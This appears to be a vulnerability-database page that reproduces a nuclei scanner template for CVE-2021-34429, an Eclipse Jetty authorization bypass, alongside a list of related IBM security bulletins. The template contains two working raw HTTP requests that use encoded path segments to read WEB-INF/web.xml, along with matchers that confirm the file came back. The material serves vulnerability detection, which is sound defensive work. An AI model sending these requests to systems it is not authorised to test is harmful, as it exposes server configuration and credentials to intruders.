Lucene search
K

Eclipse Jetty - Information Disclosure

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 48 Views

Eclipse Jetty vulnerability allows improper authorization and information disclosure, potentially leading to unauthorized access. Apply vendor-provided updates

Related
Refs
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: IBM Secure External Authentication Server is vulnerable to multiple issues due to Eclipse Jetty
29 Jul 202217:36
ibm
IBM Security Bulletins
Security Bulletin: IBM Sterling B2B Integrator vulnerable due to Eclipse Jetty
17 Oct 202213:12
ibm
IBM Security Bulletins
Security Bulletin: IBM MQ is vulnerable to multiple Eclipse Jetty issues
24 Jun 202216:32
ibm
IBM Security Bulletins
Security Bulletin: Multiple Vulnerabilities in IBM Cloud Pak for Multicloud Management
20 Mar 202517:08
ibm
IBM Security Bulletins
Security Bulletin: IBM Sterling Secure Proxy is vulnerable to multiple issues due to Eclipse Jetty
29 Jul 202217:38
ibm
IBM Security Bulletins
Security Bulletin: Multiple vulnerabilities in Eclipse Jetty affect IBM InfoSphere Information Server
17 May 202302:32
ibm
IBM Security Bulletins
Security Bulletin: An Eclipse Jetty vulnerability affects IBM Rational Functional Tester
29 Mar 202206:27
ibm
IBM Security Bulletins
Security Bulletin: IBM MaaS360 Mobile Enterprise Gateway uses Eclipse Jetty with multiple known vulnerabilities
6 Jun 202218:23
ibm
IBM Security Bulletins
Security Bulletin: Multiple Vulnerabilities in Rational Change 5.3.2 Fix Pack 04 and earlier versions.
11 Oct 202208:56
ibm
IBM Security Bulletins
Security Bulletin: Vulnerabilities in Eclipse Jetty affect Rational Performance Tester (CVE-2021-28169, CVE-2021-34428, CVE-2021-28163, CVE-2021-28164, CVE-2021-34429, CVE-2021-28165)
29 Jul 202220:31
ibm
Rows per page
id: CVE-2021-34429

info:
  name: Eclipse Jetty - Information Disclosure
  author: bernardofsr,am0nt31r0
  severity: medium
  description: |
    Eclipse Jetty 9.4.37-9.4.42, 10.0.1-10.0.5 and 11.0.1-11.0.5 are susceptible to improper authorization. URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to potential unauthorized access or further attacks.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Eclipse Jetty.
  reference:
    - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
    - https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E
    - https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34429
    - https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-34429
    cwe-id: CWE-200,NVD-CWE-Other
    epss-score: 0.99298
    epss-percentile: 0.99933
    cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: eclipse
    product: jetty
    shodan-query: cpe:"cpe:2.3:a:eclipse:jetty"
  tags: cve2021,cve,jetty,eclipse,vkev,vuln

http:
  - raw:
      - |+
        GET /%u002e/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

      - |+
        GET /.%00/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "java.sun.com"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a76fb565da5208fcdb96961af6820269e7cb39579bcebe893229afc4aa61a86e02207aa8ee056d46d0bbcfc4ae8b76b94980aa68be5734b846055342d72e170b24b7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 25
CVSS 3.15.3
EPSS0.99298
48